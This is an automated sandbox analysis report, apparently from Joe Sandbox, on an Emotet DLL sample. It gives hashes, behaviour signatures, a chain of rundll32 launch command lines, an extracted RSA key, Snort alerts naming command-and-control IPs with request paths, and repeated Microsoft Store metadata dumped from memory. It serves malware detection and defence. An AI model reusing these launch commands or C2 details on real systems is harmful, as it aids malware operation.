Analysis Report zGeK5so94c

Overview

General Information

Sample Name: zGeK5so94c (renamed file extension from none to dll)
Analysis ID: 344305
MD5: 49fbffd7602b52f05848a6016d42ec89
SHA1: b57bb387a15b3c0e10a236f3861420a9dac980cb
SHA256: 1859099c09c69aa811c525e9e70787c49048e3c24814d31ea2a17905cfad9d18

Detection

Emotet
Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for sample
Sigma detected: Suspicious Call by Ordinal
Uses known network protocols on non-standard ports
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to delete services
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (may stop execution after accessing registry keys)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains strange resources
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Startup

  • System is w10x64
  • loaddll32.exe (PID: 7100 cmdline: loaddll32.exe 'C:\Users\user\Desktop\zGeK5so94c.dll' MD5: 2D39D4DFDE8F7151723794029AB8A034)
    • WerFault.exe (PID: 4812 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7100 -s 240 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 6620 cmdline: rundll32.exe C:\Users\user\Desktop\zGeK5so94c.dll,Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 1000 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Desktop\zGeK5so94c.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • rundll32.exe (PID: 6040 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hbjpd\usib.lxs',dldZeiafGYsN MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • rundll32.exe (PID: 5760 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\Hbjpd\usib.lxs',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
            • rundll32.exe (PID: 5132 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\Hbjpd\pixmxoo.dll',#1 NAQAAB4AAABIAGIAagBwAGQAXAB1AHMAaQBiAC4AbAB4AHMAAAA= MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
              • rundll32.exe (PID: 5872 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hbjpd\usib.lxs',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                • rundll32.exe (PID: 6312 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hlqxmsfzi\jjvjowsk.xoz',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                  • rundll32.exe (PID: 6132 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bdtgy\atyx.hvl',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                    • rundll32.exe (PID: 1260 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Cfwgvspim\fwvopxwu.wpy',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                      • rundll32.exe (PID: 6932 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ibbigqfuoubc\tiynxefumvm.jsi',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                        • rundll32.exe (PID: 6692 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Aziiwkqaqp\dnweyyfur.lyr',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                          • rundll32.exe (PID: 5360 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Uchtpmhcpt\nfuoltapn.fge',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                            • rundll32.exe (PID: 5504 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zvrxg\husq.avr',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                              • rundll32.exe (PID: 4684 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jcoinynbga\etdgpznst.qoo',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                                • rundll32.exe (PID: 4940 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bfurjavtsbwkajdv\sfvtpwqlhvedlny.xdk',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                                  • rundll32.exe (PID: 6048 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Msjhyngbojq\bihctgwrjw.jsh',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                                    • rundll32.exe (PID: 4184 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mntpro\pwmgi.sow',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                                      • rundll32.exe (PID: 4632 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sioetxuvrihjyxu\wsarziebmecgqp.weo',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                                        • rundll32.exe (PID: 4752 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jvotvplywpzb\qwoawgsuzao.fmz',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                                          • rundll32.exe (PID: 6568 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ofqhxlaxbkixqlny\iogmsr.ktr',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                                            • rundll32.exe (PID: 980 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Usfyyrevasc\hoztidaylv.ruq',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                                              • rundll32.exe (PID: 6020 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wzvizgyhx\mlhiyaxu.lik',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                                                • rundll32.exe (PID: 5840 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Tthpthgifqmjjt\idvrfaaidqwxo.flr',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                                                  • rundll32.exe (PID: 6556 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jdedkdp\loyrno.rpx',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
                                                    • rundll32.exe (PID: 6288 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mwmln\clyk.jxd',Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • svchost.exe (PID: 7108 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 7156 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 7100 -ip 7100 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 6848 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6788 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6008 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAKmd+Pam+7HWeoRnZCmLHfQX3/RRijh6\nbPqYGHGBBGcEQb+EOfmkdG0BnTZfvg2iXKB8yhPQsHPR9nZoyMt7OWPYA080O3zM\nzB7+nWmsc0YPpSte4JR7YPZYIpxXZs7fFwIDAQAB"}

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
zGeK5so94c.dll | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |

Memory Dumps

Source | Rule | Description | Author | Strings
00000005.00000002.679972484.00000000729E1000.00000020.00020000.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000004.00000002.678150026.00000000729E1000.00000020.00020000.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000007.00000002.773552883.00000000729E1000.00000020.00020000.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000006.00000002.680588418.00000000729E1000.00000020.00020000.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
6.2.rundll32.exe.729e0000.1.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
4.2.rundll32.exe.729e0000.1.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
7.2.rundll32.exe.729e0000.2.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
5.2.rundll32.exe.729e0000.1.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |

Sigma Overview

System Summary:

Sigma detected: Suspicious Call by Ordinal
Source: Process started, Author: Florian Roth: Data: Command: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Desktop\zGeK5so94c.dll',#1, CommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Desktop\zGeK5so94c.dll',#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\zGeK5so94c.dll,Control_RunDLL, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 6620, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Desktop\zGeK5so94c.dll',#1, ProcessId: 1000

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: zGeK5so94c.dll, Avira: detected
Machine Learning detection for sample
Source: zGeK5so94c.dll, Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 16_2_6F545700 RegOpenKeyA,EncryptFileA,VirtualAlloc,Sleep,ExitProcess,16_2_6F545700
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 16_2_6F542180 Sleep,Module32NextW,GetCommandLineW,CommandLineToArgvW,lstrlenW,CryptStringToBinaryW,LocalFree,GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,OpenProcess,QueryFullProcessImageNameW,CloseHandle,16_2_6F542180

Compliance:

Uses 32bit PE files
Source: zGeK5so94c.dll, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: zGeK5so94c.dll, Static PE information: DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbols
Source: Binary string: aqmjrtmCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000003.00000002.673102798.0000000002E72000.00000004.00000010.sdmp
Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000003.00000003.668945836.00000000050C1000.00000004.00000001.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000003.00000003.668945836.00000000050C1000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 00000003.00000003.668945836.00000000050C1000.00000004.00000001.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 00000003.00000003.668945836.00000000050C1000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbk source: WerFault.exe, 00000003.00000003.668945836.00000000050C1000.00000004.00000001.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 16_2_6F558C1D FindFirstFileExA,16_2_6F558C1D

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2404322 ET CNC Feodo Tracker Reported CnC Server TCP group 12 192.168.2.4:49745 -> 190.55.186.229:80
Source: Traffic, Snort IDS: 2404326 ET CNC Feodo Tracker Reported CnC Server TCP group 14 192.168.2.4:49750 -> 203.157.152.9:7080
Uses known network protocols on non-standard ports
Source: unknown, Network traffic detected: HTTP traffic on port 49750 -> 7080
Source: unknown, Network traffic detected: HTTP traffic on port 7080 -> 49750
Source: global traffic, TCP traffic: 192.168.2.4:49750 -> 203.157.152.9:7080
Source: Joe Sandbox View, IP Address: 203.157.152.9
Source: Joe Sandbox View, IP Address: 190.55.186.229
Source: Joe Sandbox View, ASN Name: MOPH-TH-APInformationTechnologyOfficeSG
Source: Joe Sandbox View, ASN Name: TelecentroSAAR
Source: global traffic, TCP traffic: 192.168.2.4:49745 -> 190.55.186.229:80
Source: global traffic, HTTP traffic detected:
  POST /2ijyf1/txor3som/z3prsr3ev/l8z0/1k9au09l0vb/ HTTP/1.1
  DNT: 0
  Referer: 203.157.152.9/2ijyf1/txor3som/z3prsr3ev/l8z0/1k9au09l0vb/
  Content-Type: multipart/form-data; boundary=---------FFexYarq3
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 203.157.152.9:7080
  Content-Length: 6212
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic, HTTP traffic detected:
  POST /k8idqdr2/ HTTP/1.1
  DNT: 0
  Referer: 203.157.152.9/k8idqdr2/
  Content-Type: multipart/form-data; boundary=-----------QeejNQ4AFBy
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 203.157.152.9:7080
  Content-Length: 5732
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: unknown, TCP traffic detected without corresponding DNS query: 190.55.186.229
Source: unknown, TCP traffic detected without corresponding DNS query: 203.157.152.9
                    Source: svchost.exe, 0000000E.00000003.759251389.000001D9CB17B000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey 
","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
                    Source: svchost.exe, 0000000E.00000003.759251389.000001D9CB17B000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey 
","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
                    Source: svchost.exe, 0000000E.00000003.759251389.000001D9CB17B000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9c
c1-4bc2-ba76-e91eb1a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":374031458,"PackageFormat":"AppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.38.3802.0_neutral_~_ytsefhwckbdv6","PackageId":"a6dc1cf8-bc09-462b-7e62-6a662d08d291-X86","PackageRank":30001,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Universal"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.38.3802.0_x86__ytsefhwckbdv6\"],\"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.38.3802.0_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"plat
                    Source: svchost.exe, 0000000E.00000003.759251389.000001D9CB17B000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9c
c1-4bc2-ba76-e91eb1a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":374031458,"PackageFormat":"AppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.38.3802.0_neutral_~_ytsefhwckbdv6","PackageId":"a6dc1cf8-bc09-462b-7e62-6a662d08d291-X86","PackageRank":30001,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Universal"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.38.3802.0_x86__ytsefhwckbdv6\"],\"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.38.3802.0_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7